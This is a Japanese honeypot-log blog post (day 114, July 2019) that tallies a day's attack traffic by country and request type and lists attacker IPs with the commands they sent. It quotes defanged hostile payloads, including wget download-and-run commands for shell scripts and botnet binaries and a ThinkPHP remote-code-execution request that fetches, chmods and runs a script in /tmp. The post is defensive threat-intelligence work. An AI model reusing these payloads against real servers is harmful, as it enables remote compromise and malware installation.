23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(114日目)

2019/07/08(月)

トータルは4070件です。

ハンティングログは以下です。

123.56.49[.]19 wget hxxp[:]//84.104.112[.]92/a_thk.sh

www.virustotal.com
www.virustotal.com

47.186.67[.]61 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl
69.59.87[.]111 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com
www.virustotal.com


IPのロケーション別の件数は以下です。

クロアチア 4002
中国 22
アメリ 14
ブラジル 8
オランダ 4
台湾 3
インド 2
トルコ 2
エストニア 2
ロシア 2
イラク 1
チェコ 1
イタリア 1
南アフリカ 1
イタリア 1
香港 1
オーストラリア 1
インドネシア 1
コロンビア 1

f:id:sec23:20190709231851p:plain

件数 概要 リクエス
4005 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
42 アクセス GET /
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 不正中継の調査 GET hxxp[:]//110.249.212[.]46/testget?q=23333&port=80
2 SpringDataCommonsの脆弱性を狙った通信 POST /users?page=&size=5
1 調査 HEAD /
1 不正中継の調査 GET hxxp[:]//110.249.212[.]46/testget?q=23333&port=80
1 phpMyAdminの調査 GET /admin-scripts.asp
1 不正中継の調査 CONNECT 209.250.244.126:443
1 クローリング HEAD /robots.txt
1 BusyBoxの調査? GET /shell?busybox
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp[:]//84.104.112[.]92/a_thk.sh%20-O%20/tmp/a_thk;%20chmod%200777%20/tmp/a_thk;%20/tmp/a_thk;
1 Apache Axis2の調査 GET /axis2/